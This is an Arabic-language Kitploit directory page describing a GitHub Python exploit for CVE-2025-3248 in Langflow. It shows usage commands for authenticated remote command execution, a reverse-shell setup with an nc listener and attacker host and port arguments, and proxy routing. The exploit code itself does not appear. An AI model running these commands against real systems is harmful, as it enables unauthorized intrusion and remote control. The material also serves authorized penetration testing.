Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
RCE-CVE-2025-3248 — يستغل هذا النص البرمجي Python الثغرة CVE-2025-3248 لتنفيذ أوامر عشوائية أو إنشاء قشرة عكسية على نظام ضعيف. المصادقة مطلوبة لاستخدام هذا الاستغلال. | Kitploit
أدوات/GitHubGitHub/tiemio/rce-cve-2025-3248
الاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرأداة الوصول عن بعدتطوير الحمولات
GitHubtiemio/rce-cve-2025-3248

RCE-CVE-2025-3248

يستغل هذا النص البرمجي Python الثغرة CVE-2025-3248 لتنفيذ أوامر عشوائية أو إنشاء قشرة عكسية على نظام ضعيف. المصادقة مطلوبة لاستخدام هذا الاستغلال.

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال ثغرة CVE-2025-3248 في Langflow لتنفيذ الأوامر عن بُعد مع المصادقة

يقوم هذا النص البرمجي بلغة Python باستغلال CVE-2025-3248 لتنفيذ أوامر عشوائية أو إنشاء شِل عكسي (reverse shell) على نظام ضعيف. المصادقة مطلوبة لاستخدام هذا الاستغلال.


الميزات

  • تنفيذ الأوامر بمصادقة: تشغيل أوامر عشوائية على الهدف.
  • شِل عكسي: إنشاء شِل عكسي إلى المستمع الخاص بك.
  • دعم الوكيل (Proxy): توجيه الطلبات عبر وكيل (مثل Burp Suite).

المتطلبات

  • Python 3.x
  • مكتبة requests

قم بتثبيت التبعيات باستخدام:

root@kitploit:~
pip install requests

الاستخدام

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -l <USERNAME> -p <PASSWORD> [-c <COMMAND>] [--proxy <PROXY>] [--lhost <LHOST> --lport <LPORT>]

الوسائط

* يجب عليك تحديد إما أمر (-c) أو كلاً من --lhost و --lport للشل العكسي.


أمثلة

1. تنفيذ أمر

root@kitploit:~
python3 exploit.py -u https://target.com -l admin -p password -c "id"

2. الحصول على شِل عكسي

ابدأ مستمعًا على جهازك:

root@kitploit:~
nc -lvnp 4444

ثم قم بتشغيل:

root@kitploit:~
python3 exploit.py -u https://target.com -l admin -p password --lhost YOUR_IP --lport 4444

3. استخدام وكيل

root@kitploit:~
python3 exploit.py -u https://target.com -l admin -p password -c "whoami" --proxy http://127.0.0.1:8080

صورة Docker

نشر الصورة

يمكنك نشر صورة Docker باستخدام الأمر التالي:

root@kitploit:~
podman compose up -d

ستكون الصورة متاحة على http://localhost:7860. إسناد ملف compose: هذا المستودع


إخلاء مسؤولية

هذا النص البرمجي لأغراض تعليمية واختبار الاختراق المصرح به فقط. لا تستخدمه ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.


تم إنشاء هذا الملف التمهيدي بواسطة الذكاء الاصطناعي.

تنزيل الأداة
الوسيطةالوصفمطلوب
-u, --urlعنوان URL الأساسي للهدف (مثال: https://target.com)نعم
-l, --loginاسم مستخدم المسؤولنعم
-p, --passwordكلمة مرور المسؤولنعم
-c, --commandالأمر المراد تنفيذه على الهدفلا*
--proxyعنوان URL للوكيل (مثال: http://127.0.0.1:8080)لا
--lhostالمضيف المحلي للشل العكسيلا*
--lportالمنفذ المحلي للشل العكسيلا*